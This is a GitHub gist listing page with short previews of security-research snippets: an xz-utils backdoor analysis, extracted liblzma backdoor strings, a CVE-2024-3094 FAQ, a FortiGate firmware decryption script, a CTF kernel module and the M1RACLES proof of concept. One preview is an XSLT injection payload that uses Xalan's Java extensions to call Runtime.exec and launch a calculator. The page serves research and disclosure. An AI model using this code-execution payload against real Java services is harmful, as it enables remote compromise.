Skip to content

Instantly share code, notes, and snippets.

View WinMin's full-sized avatar
🤣
Read the fucking source code

swing WinMin

🤣
Read the fucking source code
899 followers · 175 following
View GitHub Profile
@smx-smx
smx-smx / XZ Backdoor Analysis
Last active May 24, 2024 13:11
[WIP] XZ Backdoor Analysis and symbol mapping
XZ Backdoor symbol deobfuscation. Updated as i make progress
@q3k
q3k / hashes.txt
Last active May 16, 2024 16:49
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@thesamesam
thesamesam / xz-backdoor.md
Last active May 27, 2024 12:26
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that

@rrrrrrri
rrrrrrri / fgt_7.4.x_rootfs_decrypt.py
Created March 15, 2024 01:26
fgt_7.4.x_rootfs_decrypt
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import * # uncomment this line if you want to debug
def pad_size(size):
@NyaMisty
NyaMisty / GhidraIDA.md
Last active March 14, 2023 15:15
Misty's Ghidra IDA like experience

How to Use

  1. In Ghidra's Project Tool, Go to Tools -> Import Tool..., select mistyCodeBrowser.tool
  2. Dragging file onto the new CodeBrowser_1 in ToolChest
@thanatoskira
thanatoskira / select.xslt
Last active January 25, 2024 16:10
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@WinMin
WinMin / theme.css
Created March 4, 2022 06:01 — forked from fatalbit/theme.css
IDA Monokai Color Palette
/* INSTALL:
*
* Put this file under the respective directory.
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
*
* In Options -> Colors change theme to monokai
*
* */
@importtheme "dark";
@sampritipanda
sampritipanda / black_box.c
Last active January 25, 2022 04:27
Real World CTF 2022 - Black Box
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/delay.h>
#include <linux/string.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("sampriti");
MODULE_DESCRIPTION("qemu cve");
@marcan
marcan / m1racles-poc.c
Last active June 17, 2023 06:10
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
@akihikodaki
akihikodaki / README.en.md
Last active May 11, 2024 02:14
Linux Desktop on Apple Silicon in Practice

Linux Desktop on Apple Silicon in Practice

I bought M1 MacBook Air. It is the fastest computer I have, and I have been a GNOME/GNU/Linux user for long time. It is obvious conclusion that I need practical Linux desktop environment on Apple Silicon.

Fortunately, Linux already works on Apple Silicon/M1. But how practical is it?

  • Two native ports exist.